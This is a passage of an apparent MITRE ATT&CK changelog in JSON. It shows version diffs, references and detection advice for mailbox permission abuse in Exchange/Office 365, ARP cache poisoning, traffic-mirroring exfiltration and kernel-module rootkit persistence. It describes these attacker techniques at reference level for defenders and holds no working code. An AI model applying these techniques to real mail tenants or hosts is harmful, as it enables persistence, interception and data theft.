Add-MailboxPermission [PowerShell](https://attack.mitre.org/techniques/T1059/001) cmdlet, available in on-premises Exchange and in the cloud-based service Office 365, adds permissions to a mailbox.(Citation: Microsoft - Add-MailboxPermission)(Citation: FireEye APT35 2018)(Citation: Crowdstrike Hiding in Plain Sight 2018)\n\nAdversaries may also assign mailbox folder permissions through individual folder permissions or roles. Adversaries may assign the Default or Anonymous user permissions or roles to the Top of Information Store (root), Inbox, or other mailbox folders. By assigning one or both user permissions to a folder, the adversary can utilize any other account in the tenant to maintain persistence to the target user\u2019s mail folders.(Citation: Remediation and Hardening Strategies for Microsoft 365 to Defend Against UNC2452)\n\nThis may be used in persistent threat incidents as well as BEC (Business Email Compromise) incidents where an adversary can assign more access rights to the accounts they wish to compromise. This may further enable use of additional techniques for gaining access to systems. For example, compromised business accounts are often used to send messages to other accounts in the network of the target business while creating inbox rules (ex: [Internal Spearphishing](https://attack.mitre.org/techniques/T1534)), so the messages evade spam/phishing detection mechanisms.(Citation: Bienstock, D. - Defending O365 - 2019)",
"kill_chain_phases": [
{
"kill_chain_name": "mitre-attack",
"phase_name": "persistence"
}
],
"revoked": false,
"external_references": [
{
"source_name": "mitre-attack",
"url": "https://attack.mitre.org/techniques/T1098/002",
"external_id": "T1098.002"
},
{
"source_name": "Microsoft - Add-MailboxPermission",
"description": "Microsoft. (n.d.). Add-Mailbox Permission. Retrieved September 13, 2019.",
"url": "https://docs.microsoft.com/en-us/powershell/module/exchange/mailboxes/add-mailboxpermission?view=exchange-ps"
},
{
"source_name": "FireEye APT35 2018",
"description": "Mandiant. (2018). Mandiant M-Trends 2018. Retrieved July 9, 2018.",
"url": "https://www.fireeye.com/content/dam/collateral/en/mtrends-2018.pdf"
},
{
"source_name": "Crowdstrike Hiding in Plain Sight 2018",
"description": "Crowdstrike. (2018, July 18). Hiding in Plain Sight: Using the Office 365 Activities API to Investigate Business Email Compromises. Retrieved January 19, 2020.",
"url": "https://www.crowdstrike.com/blog/hiding-in-plain-sight-using-the-office-365-activities-api-to-investigate-business-email-compromises/"
},
{
"source_name": "Remediation and Hardening Strategies for Microsoft 365 to Defend Against UNC2452",
"description": "Mike Burns, Matthew McWhirt, Douglas Bienstock, Nick Bennett. (2021, January 19). Remediation and Hardening Strategies for Microsoft 365 to Defend Against UNC2452. Retrieved September 25, 2021.",
"url": "https://www.fireeye.com/blog/threat-research/2021/01/remediation-and-hardening-strategies-for-microsoft-365-to-defend-against-unc2452.html"
},
{
"source_name": "Bienstock, D. - Defending O365 - 2019",
"description": "Bienstock, D.. (2019). BECS and Beyond: Investigating and Defending O365. Retrieved September 13, 2019.",
"url": "https://www.slideshare.net/DouglasBienstock/shmoocon-2019-becs-and-beyond-investigating-and-defending-office-365"
}
],
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"x_mitre_contributors": [
"Microsoft Detection and Response Team (DART)",
"Mike Burns, Mandiant",
"Naveen Vijayaraghavan, Nilesh Dherange (Gurucul)",
"Jannie Li, Microsoft Threat Intelligence\u202fCenter\u202f(MSTIC)"
],
"x_mitre_data_sources": [
"Application Log: Application Log Content",
"Group: Group Modification",
"User Account: User Account Modification"
],
"x_mitre_detection": "Monitor for unusual Exchange and Office 365 email account permissions changes that may indicate excessively broad permissions being granted to compromised accounts.\n\nEnable the UpdateFolderPermissions action for all logon types. The mailbox audit log will forward folder permission modification events to the Unified Audit Log. Create rules to alert on ModifyFolderPermissions operations where the Anonymous or Default user is assigned permissions other than None. \n\nA larger than normal volume of emails sent from an account and similar phishing emails sent from \u202freal accounts within a network may be a sign that an account was compromised and attempts to leverage access with modified email permissions is occurring.",
"x_mitre_is_subtechnique": true,
"x_mitre_permissions_required": [
"Administrator"
],
"x_mitre_platforms": [
"Windows",
"Office 365"
],
"x_mitre_version": "1.1",
"detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2021-10-18 18:57:04.148000+00:00\", \"old_value\": \"2020-05-04 19:18:36.254000+00:00\"}, \"root['description']\": {\"new_value\": \"Adversaries may grant additional permission levels, such as ReadPermission or FullAccess, to maintain persistent access to an adversary-controlled email account. The Add-MailboxPermission [PowerShell](https://attack.mitre.org/techniques/T1059/001) cmdlet, available in on-premises Exchange and in the cloud-based service Office 365, adds permissions to a mailbox.(Citation: Microsoft - Add-MailboxPermission)(Citation: FireEye APT35 2018)(Citation: Crowdstrike Hiding in Plain Sight 2018)\\n\\nAdversaries may also assign mailbox folder permissions through individual folder permissions or roles. Adversaries may assign the Default or Anonymous user permissions or roles to the Top of Information Store (root), Inbox, or other mailbox folders. By assigning one or both user permissions to a folder, the adversary can utilize any other account in the tenant to maintain persistence to the target user\\u2019s mail folders.(Citation: Remediation and Hardening Strategies for Microsoft 365 to Defend Against UNC2452)\\n\\nThis may be used in persistent threat incidents as well as BEC (Business Email Compromise) incidents where an adversary can assign more access rights to the accounts they wish to compromise. This may further enable use of additional techniques for gaining access to systems. For example, compromised business accounts are often used to send messages to other accounts in the network of the target business while creating inbox rules (ex: [Internal Spearphishing](https://attack.mitre.org/techniques/T1534)), so the messages evade spam/phishing detection mechanisms.(Citation: Bienstock, D. - Defending O365 - 2019)\", \"old_value\": \"Adversaries may grant additional permission levels, such as ReadPermission or FullAccess, to maintain persistent access to an adversary-controlled email account. The Add-MailboxPermission [PowerShell](https://attack.mitre.org/techniques/T1059/001) cmdlet, available in on-premises Exchange and in the cloud-based service Office 365, adds permissions to a mailbox.(Citation: Microsoft - Add-MailboxPermission)(Citation: FireEye APT35 2018)(Citation: Crowdstrike Hiding in Plain Sight 2018)\\n\\nThis may be used in persistent threat incidents as well as BEC (Business Email Compromise) incidents where an adversary can assign more access rights to the accounts they wish to compromise. This may further enable use of additional techniques for gaining access to systems. For example, compromised business accounts are often used to send messages to other accounts in the network of the target business while creating inbox rules (ex: [Internal Spearphishing](https://attack.mitre.org/techniques/T1534)), so the messages evade spam/phishing detection mechanisms.(Citation: Bienstock, D. - Defending O365 - 2019)\", \"diff\": \"--- \\n+++ \\n@@ -1,3 +1,5 @@\\n Adversaries may grant additional permission levels, such as ReadPermission or FullAccess, to maintain persistent access to an adversary-controlled email account. The Add-MailboxPermission [PowerShell](https://attack.mitre.org/techniques/T1059/001) cmdlet, available in on-premises Exchange and in the cloud-based service Office 365, adds permissions to a mailbox.(Citation: Microsoft - Add-MailboxPermission)(Citation: FireEye APT35 2018)(Citation: Crowdstrike Hiding in Plain Sight 2018)\\n \\n+Adversaries may also assign mailbox folder permissions through individual folder permissions or roles. Adversaries may assign the Default or Anonymous user permissions or roles to the Top of Information Store (root), Inbox, or other mailbox folders. By assigning one or both user permissions to a folder, the adversary can utilize any other account in the tenant to maintain persistence to the target user\\u2019s mail folders.(Citation: Remediation and Hardening Strategies for Microsoft 365 to Defend Against UNC2452)\\n+\\n This may be used in persistent threat incidents as well as BEC (Business Email Compromise) incidents where an adversary can assign more access rights to the accounts they wish to compromise. This may further enable use of additional techniques for gaining access to systems. For example, compromised business accounts are often used to send messages to other accounts in the network of the target business while creating inbox rules (ex: [Internal Spearphishing](https://attack.mitre.org/techniques/T1534)), so the messages evade spam/phishing detection mechanisms.(Citation: Bienstock, D. - Defending O365 - 2019)\"}, \"root['external_references'][4]['source_name']\": {\"new_value\": \"Remediation and Hardening Strategies for Microsoft 365 to Defend Against UNC2452\", \"old_value\": \"Bienstock, D. - Defending O365 - 2019\"}, \"root['external_references'][4]['description']\": {\"new_value\": \"Mike Burns, Matthew McWhirt, Douglas Bienstock, Nick Bennett. (2021, January 19). Remediation and Hardening Strategies for Microsoft 365 to Defend Against UNC2452. Retrieved September 25, 2021.\", \"old_value\": \"Bienstock, D.. (2019). BECS and Beyond: Investigating and Defending O365. Retrieved September 13, 2019.\"}, \"root['external_references'][4]['url']\": {\"new_value\": \"https://www.fireeye.com/blog/threat-research/2021/01/remediation-and-hardening-strategies-for-microsoft-365-to-defend-against-unc2452.html\", \"old_value\": \"https://www.slideshare.net/DouglasBienstock/shmoocon-2019-becs-and-beyond-investigating-and-defending-office-365\"}, \"root['x_mitre_detection']\": {\"new_value\": \"Monitor for unusual Exchange and Office 365 email account permissions changes that may indicate excessively broad permissions being granted to compromised accounts.\\n\\nEnable the UpdateFolderPermissions action for all logon types. The mailbox audit log will forward folder permission modification events to the Unified Audit Log. Create rules to alert on ModifyFolderPermissions operations where the Anonymous or Default user is assigned permissions other than None. \\n\\nA larger than normal volume of emails sent from an account and similar phishing emails sent from \\u202freal accounts within a network may be a sign that an account was compromised and attempts to leverage access with modified email permissions is occurring.\", \"old_value\": \"Monitor for unusual Exchange and Office 365 email account permissions changes that may indicate excessively broad permissions being granted to compromised accounts.\\n\\nA larger than normal volume of emails sent from an account and similar phishing emails sent from \\u202freal accounts within a network may be a sign that an account was compromised and attempts to leverage access with modified email permissions is occurring.\", \"diff\": \"--- \\n+++ \\n@@ -1,3 +1,5 @@\\n Monitor for unusual Exchange and Office 365 email account permissions changes that may indicate excessively broad permissions being granted to compromised accounts.\\n \\n+Enable the UpdateFolderPermissions action for all logon types. The mailbox audit log will forward folder permission modification events to the Unified Audit Log. Create rules to alert on ModifyFolderPermissions operations where the Anonymous or Default user is assigned permissions other than None. \\n+\\n A larger than normal volume of emails sent from an account and similar phishing emails sent from \\u202freal accounts within a network may be a sign that an account was compromised and attempts to leverage access with modified email permissions is occurring.\"}, \"root['x_mitre_version']\": {\"new_value\": \"1.1\", \"old_value\": \"1.0\"}}, \"iterable_item_added\": {\"root['external_references'][5]\": {\"source_name\": \"Bienstock, D. - Defending O365 - 2019\", \"description\": \"Bienstock, D.. (2019). BECS and Beyond: Investigating and Defending O365. Retrieved September 13, 2019.\", \"url\": \"https://www.slideshare.net/DouglasBienstock/shmoocon-2019-becs-and-beyond-investigating-and-defending-office-365\"}, \"root['x_mitre_contributors'][0]\": \"Microsoft Detection and Response Team (DART)\", \"root['x_mitre_contributors'][1]\": \"Mike Burns, Mandiant\", \"root['x_mitre_contributors'][2]\": \"Naveen Vijayaraghavan, Nilesh Dherange (Gurucul)\", \"root['x_mitre_data_sources'][0]\": \"Application Log: Application Log Content\"}}",
"previous_version": "1.0",
"version_change": "1.0 \u2192 1.1",
"description_change_table": "\n | Old Description | New Description | ||||
|---|---|---|---|---|---|
| t | 1 | Adversaries may grant additional permission levels, such as | t | 1 | Adversaries may grant additional permission levels, such as |
| > | ReadPermission or FullAccess, to maintain persistent access | > | ReadPermission or FullAccess, to maintain persistent access | ||
| > | to an adversary-controlled email account. The <code>Add-Mail | > | to an adversary-controlled email account. The <code>Add-Mail | ||
| > | boxPermission</code> [PowerShell](https://attack.mitre.org/t | > | boxPermission</code> [PowerShell](https://attack.mitre.org/t | ||
| > | echniques/T1059/001) cmdlet, available in on-premises Exchan | > | echniques/T1059/001) cmdlet, available in on-premises Exchan | ||
| > | ge and in the cloud-based service Office 365, adds permissio | > | ge and in the cloud-based service Office 365, adds permissio | ||
| > | ns to a mailbox.(Citation: Microsoft - Add-MailboxPermission | > | ns to a mailbox.(Citation: Microsoft - Add-MailboxPermission | ||
| > | )(Citation: FireEye APT35 2018)(Citation: Crowdstrike Hiding | > | )(Citation: FireEye APT35 2018)(Citation: Crowdstrike Hiding | ||
| > | in Plain Sight 2018) This may be used in persistent threat | > | in Plain Sight 2018) Adversaries may also assign mailbox f | ||
| > | incidents as well as BEC (Business Email Compromise) incide | > | older permissions through individual folder permissions or r | ||
| > | nts where an adversary can assign more access rights to the | > | oles. Adversaries may assign the Default or Anonymous user p | ||
| > | accounts they wish to compromise. This may further enable us | > | ermissions or roles to the Top of Information Store (root), | ||
| > | e of additional techniques for gaining access to systems. Fo | > | Inbox, or other mailbox folders. By assigning one or both us | ||
| > | r example, compromised business accounts are often used to s | > | er permissions to a folder, the adversary can utilize any ot | ||
| > | end messages to other accounts in the network of the target | > | her account in the tenant to maintain persistence to the tar | ||
| > | business while creating inbox rules (ex: [Internal Spearphis | > | get user\u2019s mail folders.(Citation: Remediation and Hardening | ||
| > | hing](https://attack.mitre.org/techniques/T1534)), so the me | > | Strategies for Microsoft 365 to Defend Against UNC2452) Th | ||
| > | ssages evade spam/phishing detection mechanisms.(Citation: B | > | is may be used in persistent threat incidents as well as BEC | ||
| > | ienstock, D. - Defending O365 - 2019) | > | (Business Email Compromise) incidents where an adversary ca | ||
| > | n assign more access rights to the accounts they wish to com | ||||
| > | promise. This may further enable use of additional technique | ||||
| > | s for gaining access to systems. For example, compromised bu | ||||
| > | siness accounts are often used to send messages to other acc | ||||
| > | ounts in the network of the target business while creating i | ||||
| > | nbox rules (ex: [Internal Spearphishing](https://attack.mitr | ||||
| > | e.org/techniques/T1534)), so the messages evade spam/phishin | ||||
| > | g detection mechanisms.(Citation: Bienstock, D. - Defending | ||||
| > | O365 - 2019) |
| Old Description | New Description | ||||
|---|---|---|---|---|---|
| t | 1 | Adversaries may poison Address Resolution Protocol (ARP) cac | t | 1 | Adversaries may poison Address Resolution Protocol (ARP) cac |
| > | hes to position themselves between the communication of two | > | hes to position themselves between the communication of two | ||
| > | or more networked devices. This activity may be used to enab | > | or more networked devices. This activity may be used to enab | ||
| > | le follow-on behaviors such as [Network Sniffing](https://at | > | le follow-on behaviors such as [Network Sniffing](https://at | ||
| > | tack.mitre.org/techniques/T1040) or [Transmitted Data Manipu | > | tack.mitre.org/techniques/T1040) or [Transmitted Data Manipu | ||
| > | lation](https://attack.mitre.org/techniques/T1565/002). The | > | lation](https://attack.mitre.org/techniques/T1565/002). The | ||
| > | ARP protocol is used to resolve IPv4 addresses to link laye | > | ARP protocol is used to resolve IPv4 addresses to link laye | ||
| > | r addresses, such as a media access control (MAC) address.(C | > | r addresses, such as a media access control (MAC) address.(C | ||
| > | itation: RFC826 ARP) Devices in a local network segment comm | > | itation: RFC826 ARP) Devices in a local network segment comm | ||
| > | unicate with each other by using link layer addresses. If a | > | unicate with each other by using link layer addresses. If a | ||
| > | networked device does not have the link layer address of a p | > | networked device does not have the link layer address of a p | ||
| > | articular networked device, it may send out a broadcast ARP | > | articular networked device, it may send out a broadcast ARP | ||
| > | request to the local network to translate the IP address to | > | request to the local network to translate the IP address to | ||
| > | a MAC address. The device with the associated IP address dir | > | a MAC address. The device with the associated IP address dir | ||
| > | ectly replies with its MAC address. The networked device tha | > | ectly replies with its MAC address. The networked device tha | ||
| > | t made the ARP request will then use as well as store that i | > | t made the ARP request will then use as well as store that i | ||
| > | nformation in its ARP cache. An adversary may passively wai | > | nformation in its ARP cache. An adversary may passively wai | ||
| > | t for an ARP request to poison the ARP cache of the requesti | > | t for an ARP request to poison the ARP cache of the requesti | ||
| > | ng device. The adversary may reply with their MAC address, t | > | ng device. The adversary may reply with their MAC address, t | ||
| > | hus deceiving the victim by making them believe that they ar | > | hus deceiving the victim by making them believe that they ar | ||
| > | e communicating with the intended networked device. For the | > | e communicating with the intended networked device. For the | ||
| > | adversary to poison the ARP cache, their reply must be faste | > | adversary to poison the ARP cache, their reply must be faste | ||
| > | r than the one made by the legitimate IP address owner. Adve | > | r than the one made by the legitimate IP address owner. Adve | ||
| > | rsaries may also send a gratuitous ARP reply that maliciousl | > | rsaries may also send a gratuitous ARP reply that maliciousl | ||
| > | y announces the ownership of a particular IP address to all | > | y announces the ownership of a particular IP address to all | ||
| > | the devices in the local network segment. The ARP protocol | > | the devices in the local network segment. The ARP protocol | ||
| > | is stateless and does not require authentication. Therefore, | > | is stateless and does not require authentication. Therefore, | ||
| > | devices may wrongly add or update the MAC address of the IP | > | devices may wrongly add or update the MAC address of the IP | ||
| > | address in their ARP cache.(Citation: Sans ARP Spoofing Aug | > | address in their ARP cache.(Citation: Sans ARP Spoofing Aug | ||
| > | 2003)(Citation: Cylance Cleaver) Adversaries may use ARP c | > | 2003)(Citation: Cylance Cleaver) Adversaries may use ARP c | ||
| > | ache poisoning as a means to man-in-the-middle (MiTM) networ | > | ache poisoning as a means to intercept network traffic. This | ||
| > | k traffic. This activity may be used to collect and/or relay | > | activity may be used to collect and/or relay data such as c | ||
| > | data such as credentials, especially those sent over an ins | > | redentials, especially those sent over an insecure, unencryp | ||
| > | ecure, unencrypted protocol.(Citation: Sans ARP Spoofing Aug | > | ted protocol.(Citation: Sans ARP Spoofing Aug 2003) | ||
| > | 2003) |
| Old Description | New Description | ||||
|---|---|---|---|---|---|
| t | 1 | Adversaries may leverage traffic mirroring in order to autom | t | 1 | Adversaries may leverage traffic mirroring in order to autom |
| > | ate data exfiltration over compromised network infrastructur | > | ate data exfiltration over compromised network infrastructur | ||
| > | e. Traffic mirroring is a native feature for some network d | > | e. Traffic mirroring is a native feature for some network d | ||
| > | evices and used for network analysis and may be configured t | > | evices and used for network analysis and may be configured t | ||
| > | o duplicate traffic and forward to one or more destinations | > | o duplicate traffic and forward to one or more destinations | ||
| > | for analysis by a network analyzer or other monitoring devic | > | for analysis by a network analyzer or other monitoring devic | ||
| > | e. (Citation: Cisco Traffic Mirroring) (Citation: Juniper Tr | > | e. (Citation: Cisco Traffic Mirroring) (Citation: Juniper Tr | ||
| > | affic Mirroring) Adversaries may abuse traffic mirroring to | > | affic Mirroring) Adversaries may abuse traffic mirroring to | ||
| > | mirror or redirect network traffic through other network in | > | mirror or redirect network traffic through other network in | ||
| > | frastructure they control. Malicious modifications to networ | > | frastructure they control. Malicious modifications to networ | ||
| > | k devices to enable traffic redirection may be possible thro | > | k devices to enable traffic redirection may be possible thro | ||
| > | ugh [ROMMONkit](https://attack.mitre.org/techniques/T1542/00 | > | ugh [ROMMONkit](https://attack.mitre.org/techniques/T1542/00 | ||
| > | 4) or [Patch System Image](https://attack.mitre.org/techniqu | > | 4) or [Patch System Image](https://attack.mitre.org/techniqu | ||
| > | es/T1601/001).(Citation: US-CERT-TA18-106A)(Citation: Cisco | > | es/T1601/001).(Citation: US-CERT-TA18-106A)(Citation: Cisco | ||
| > | Blog Legacy Device Attacks) Adversaries may use traffic dupl | > | Blog Legacy Device Attacks) Adversaries may use traffic dupl | ||
| > | ication in conjunction with [Network Sniffing](https://attac | > | ication in conjunction with [Network Sniffing](https://attac | ||
| > | k.mitre.org/techniques/T1040), [Input Capture](https://attac | > | k.mitre.org/techniques/T1040), [Input Capture](https://attac | ||
| > | k.mitre.org/techniques/T1056), or [Man-in-the-Middle](https: | > | k.mitre.org/techniques/T1056), or [Adversary-in-the-Middle]( | ||
| > | //attack.mitre.org/techniques/T1557) depending on the goals | > | https://attack.mitre.org/techniques/T1557) depending on the | ||
| > | and objectives of the adversary. | > | goals and objectives of the adversary. |
kextload and kextunload commands. Since macOS Catalina 10.15, kernel extensions have been deprecated on macOS systems.(Citation: Apple Kernel Extension Deprecation)\n\nAdversaries can use LKMs and kexts to covertly persist on a system and elevate privileges. Examples have been found in the wild and there are some open source projects. (Citation: Volatility Phalanx2) (Citation: CrowdStrike Linux Rootkit) (Citation: GitHub Reptile) (Citation: GitHub Diamorphine)(Citation: RSAC 2015 San Francisco Patrick Wardle) (Citation: Synack Secure Kernel Extension Broken)(Citation: Securelist Ventir) (Citation: Trend Micro Skidmap)",
"kill_chain_phases": [
{
"kill_chain_name": "mitre-attack",
"phase_name": "persistence"
},
{
"kill_chain_name": "mitre-attack",
"phase_name": "privilege-escalation"
}
],
"revoked": false,
"external_references": [
{
"source_name": "mitre-attack",
"url": "https://attack.mitre.org/techniques/T1547/006",
"external_id": "T1547.006"
},
{
"source_name": "Linux Kernel Programming",
"description": "Pomerantz, O., Salzman, P.. (2003, April 4). The Linux Kernel Module Programming Guide. Retrieved April 6, 2018.",
"url": "https://www.tldp.org/LDP/lkmpg/2.4/lkmpg.pdf"
},
{
"source_name": "Linux Kernel Module Programming Guide",
"description": "Pomerantz, O., Salzman, P. (2003, April 4). Modules vs Programs. Retrieved April 6, 2018.",
"url": "http://www.tldp.org/LDP/lkmpg/2.4/html/x437.html"
},
{
"source_name": "iDefense Rootkit Overview",
"description": "Chuvakin, A. (2003, February). An Overview of Rootkits. Retrieved April 6, 2018.",
"url": "http://www.megasecurity.org/papers/Rootkits.pdf"
},
{
"source_name": "Apple Kernel Extension Deprecation",
"description": "Apple. (n.d.). Deprecated Kernel Extensions and System Extension Alternatives. Retrieved November 4, 2020.",
"url": "https://developer.apple.com/support/kernel-extensions/"
},
{
"source_name": "Volatility Phalanx2",
"description": "Case, A. (2012, October 10). Phalanx 2 Revealed: Using Volatility to Analyze an Advanced Linux Rootkit. Retrieved April 9, 2018.",
"url": "https://volatility-labs.blogspot.com/2012/10/phalanx-2-revealed-using-volatility-to.html"
},
{
"source_name": "CrowdStrike Linux Rootkit",
"description": "Kurtz, G. (2012, November 19). HTTP iframe Injecting Linux Rootkit. Retrieved December 21, 2017.",
"url": "https://www.crowdstrike.com/blog/http-iframe-injecting-linux-rootkit/"
},
{
"source_name": "GitHub Reptile",
"description": "Augusto, I. (2018, March 8). Reptile - LMK Linux rootkit. Retrieved April 9, 2018.",
"url": "https://github.com/f0rb1dd3n/Reptile"
},
{
"source_name": "GitHub Diamorphine",
"description": "Mello, V. (2018, March 8). Diamorphine - LMK rootkit for Linux Kernels 2.6.x/3.x/4.x (x86 and x86_64). Retrieved April 9, 2018.",
"url": "https://github.com/m0nad/Diamorphine"
},
{
"source_name": "RSAC 2015 San Francisco Patrick Wardle",
"description": "Wardle, P. (2015, April). Malware Persistence on OS X Yosemite. Retrieved April 6, 2018.",
"url": "https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf"
},
{
"source_name": "Synack Secure Kernel Extension Broken",
"description": "Wardle, P. (2017, September 8). High Sierra\u2019s \u2018Secure Kernel Extension Loading\u2019 is Broken. Retrieved April 6, 2018.",
"url": "https://www.synack.com/2017/09/08/high-sierras-secure-kernel-extension-loading-is-broken/"
},
{
"source_name": "Securelist Ventir",
"description": "Mikhail, K. (2014, October 16). The Ventir Trojan: assemble your MacOS spy. Retrieved April 6, 2018.",
"url": "https://securelist.com/the-ventir-trojan-assemble-your-macos-spy/67267/"
},
{
"source_name": "Trend Micro Skidmap",
"description": "Remillano, A., Urbanec, J. (2019, September 19). Skidmap Linux Malware Uses Rootkit Capabilities to Hide Cryptocurrency-Mining Payload. Retrieved June 4, 2020.",
"url": "https://blog.trendmicro.com/trendlabs-security-intelligence/skidmap-linux-malware-uses-rootkit-capabilities-to-hide-cryptocurrency-mining-payload/"
},
{
"source_name": "Linux Loadable Kernel Module Insert and Remove LKMs",
"description": "Henderson, B. (2006, September 24). How To Insert And Remove LKMs. Retrieved April 9, 2018.",
"url": "http://tldp.org/HOWTO/Module-HOWTO/x197.html"
},
{
"source_name": "Wikipedia Loadable Kernel Module",
"description": "Wikipedia. (2018, March 17). Loadable kernel module. Retrieved April 9, 2018.",
"url": "https://en.wikipedia.org/wiki/Loadable_kernel_module#Linux"
},
{
"source_name": "User Approved Kernel Extension Pike\u2019s",
"description": "Pikeralpha. (2017, August 29). User Approved Kernel Extension Loading\u2026. Retrieved September 23, 2021.",
"url": "https://pikeralpha.wordpress.com/2017/08/29/user-approved-kernel-extension-loading/"
},
{
"source_name": "Purves Kextpocalypse 2",
"description": "Richard Purves. (2017, November 9). MDM and the Kextpocalypse . Retrieved September 23, 2021.",
"url": "https://richard-purves.com/2017/11/09/mdm-and-the-kextpocalypse-2/"
},
{
"source_name": "Apple Developer Configuration Profile",
"description": "Apple. (2019, May 3). Configuration Profile Reference. Retrieved September 23, 2021.",
"url": "https://developer.apple.com/business/documentation/Configuration-Profile-Reference.pdf"
}
],
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"x_mitre_contributors": [
"Wayne Silva, F-Secure Countercept",
"Anastasios Pingios",
"Jeremy Galloway",
"Red Canary"
],
"x_mitre_data_sources": [
"File: File Modification",
"Command: Command Execution",
"File: File Creation",
"Kernel: Kernel Module Load"
],
"x_mitre_detection": "Loading, unloading, and manipulating modules on Linux systems can be detected by monitoring for the following commands: modprobe, insmod, lsmod, rmmod, or modinfo (Citation: Linux Loadable Kernel Module Insert and Remove LKMs) LKMs are typically loaded into /lib/modules and have had the extension .ko (\"kernel object\") since version 2.6 of the Linux kernel. (Citation: Wikipedia Loadable Kernel Module)\n\nAdversaries may run commands on the target system before loading a malicious module in order to ensure that it is properly compiled. (Citation: iDefense Rootkit Overview) Adversaries may also execute commands to identify the exact version of the running Linux kernel and/or download multiple versions of the same .ko (kernel object) files to use the one appropriate for the running system.(Citation: Trend Micro Skidmap) Many LKMs require Linux headers (specific to the target kernel) in order to compile properly.\u00a0These are typically obtained through the operating systems package manager and installed like a normal package. On Ubuntu and Debian based systems this can be accomplished by running: apt-get install linux-headers-$(uname -r) On RHEL and CentOS based systems this can be accomplished by running: yum install kernel-devel-$(uname -r)\n\nOn macOS, monitor for execution of kextload commands and user installed kernel extensions performing abnormal and/or potentially malicious activity (such as creating network connections). Monitor for new rows added in the kext_policy table. KextPolicy stores a list of user approved (non Apple) kernel extensions and a partial history of loaded kernel modules in a SQLite database, /var/db/SystemPolicyConfiguration/KextPolicy.(Citation: User Approved Kernel Extension Pike\u2019s)(Citation: Purves Kextpocalypse 2)(Citation: Apple Developer Configuration Profile)\n",
"x_mitre_is_subtechnique": true,
"x_mitre_permissions_required": [
"root"
],
"x_mitre_platforms": [
"macOS",
"Linux"
],
"x_mitre_version": "1.2",
"detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2021-10-19 04:03:46.357000+00:00\", \"old_value\": \"2021-03-30 00:59:53.716000+00:00\"}, \"root['x_mitre_detection']\": {\"new_value\": \"Loading, unloading, and manipulating modules on Linux systems can be detected by monitoring for the following commands: modprobe, insmod, lsmod, rmmod, or modinfo (Citation: Linux Loadable Kernel Module Insert and Remove LKMs) LKMs are typically loaded into /lib/modules and have had the extension .ko (\\\"kernel object\\\") since version 2.6 of the Linux kernel. (Citation: Wikipedia Loadable Kernel Module)\\n\\nAdversaries may run commands on the target system before loading a malicious module in order to ensure that it is properly compiled. (Citation: iDefense Rootkit Overview) Adversaries may also execute commands to identify the exact version of the running Linux kernel and/or download multiple versions of the same .ko (kernel object) files to use the one appropriate for the running system.(Citation: Trend Micro Skidmap) Many LKMs require Linux headers (specific to the target kernel) in order to compile properly.\\u00a0These are typically obtained through the operating systems package manager and installed like a normal package. On Ubuntu and Debian based systems this can be accomplished by running: apt-get install linux-headers-$(uname -r) On RHEL and CentOS based systems this can be accomplished by running: yum install kernel-devel-$(uname -r)\\n\\nOn macOS, monitor for execution of kextload commands and user installed kernel extensions performing abnormal and/or potentially malicious activity (such as creating network connections). Monitor for new rows added in the kext_policy table. KextPolicy stores a list of user approved (non Apple) kernel extensions and a partial history of loaded kernel modules in a SQLite database, /var/db/SystemPolicyConfiguration/KextPolicy.(Citation: User Approved Kernel Extension Pike\\u2019s)(Citation: Purves Kextpocalypse 2)(Citation: Apple Developer Configuration Profile)\\n\", \"old_value\": \"Loading, unloading, and manipulating modules on Linux systems can be detected by monitoring for the following commands:modprobe, insmod, lsmod, rmmod, or modinfo (Citation: Linux Loadable Kernel Module Insert and Remove LKMs) LKMs are typically loaded into /lib/modules and have had the extension .ko (\\\"kernel object\\\") since version 2.6 of the Linux kernel. (Citation: Wikipedia Loadable Kernel Module)\\n\\nFor macOS, monitor for execution of kextload commands and correlate with other unknown or suspicious activity.\\n\\nAdversaries may run commands on the target system before loading a malicious module in order to ensure that it is properly compiled. (Citation: iDefense Rootkit Overview) Adversaries may also execute commands to identify the exact version of the running Linux kernel and/or download multiple versions of the same .ko (kernel object) files to use the one appropriate for the running system.(Citation: Trend Micro Skidmap) Many LKMs require Linux headers (specific to the target kernel) in order to compile properly.\\u00a0These are typically obtained through the operating systems package manager and installed like a normal package. On Ubuntu and Debian based systems this can be accomplished by running: apt-get install linux-headers-$(uname -r) On RHEL and CentOS based systems this can be accomplished by running: yum install kernel-devel-$(uname -r)\", \"diff\": \"--- \\n+++ \\n@@ -1,5 +1,5 @@\\n-Loading, unloading, and manipulating modules on Linux systems can be detected by monitoring for the following commands:modprobe, insmod, lsmod, rmmod, or modinfo (Citation: Linux Loadable Kernel Module Insert and Remove LKMs) LKMs are typically loaded into /lib/modules and have had the extension .ko (\\\"kernel object\\\") since version 2.6 of the Linux kernel. (Citation: Wikipedia Loadable Kernel Module)\\n-\\n-For macOS, monitor for execution of kextload commands and correlate with other unknown or suspicious activity.\\n+Loading, unloading, and manipulating modules on Linux systems can be detected by monitoring for the following commands: modprobe, insmod, lsmod, rmmod, or modinfo (Citation: Linux Loadable Kernel Module Insert and Remove LKMs) LKMs are typically loaded into /lib/modules and have had the extension .ko (\\\"kernel object\\\") since version 2.6 of the Linux kernel. (Citation: Wikipedia Loadable Kernel Module)\\n \\n Adversaries may run commands on the target system before loading a malicious module in order to ensure that it is properly compiled. (Citation: iDefense Rootkit Overview) Adversaries may also execute commands to identify the exact version of the running Linux kernel and/or download multiple versions of the same .ko (kernel object) files to use the one appropriate for the running system.(Citation: Trend Micro Skidmap) Many LKMs require Linux headers (specific to the target kernel) in order to compile properly.\\u00a0These are typically obtained through the operating systems package manager and installed like a normal package. On Ubuntu and Debian based systems this can be accomplished by running: apt-get install linux-headers-$(uname -r) On RHEL and CentOS based systems this can be accomplished by running: yum install kernel-devel-$(uname -r)\\n+\\n+On macOS, monitor for execution of kextload commands and user installed kernel extensions performing abnormal and/or potentially malicious activity (such as creating network connections). Monitor for new rows added in the kext_policy table. KextPolicy stores a list of user approved (non Apple) kernel extensions and a partial history of loaded kernel modules in a SQLite database, /var/db/SystemPolicyConfiguration/KextPolicy.(Citation: User Approved Kernel Extension Pike\\u2019s)(Citation: Purves Kextpocalypse 2)(Citation: Apple Developer Configuration Profile)\"}, \"root['x_mitre_version']\": 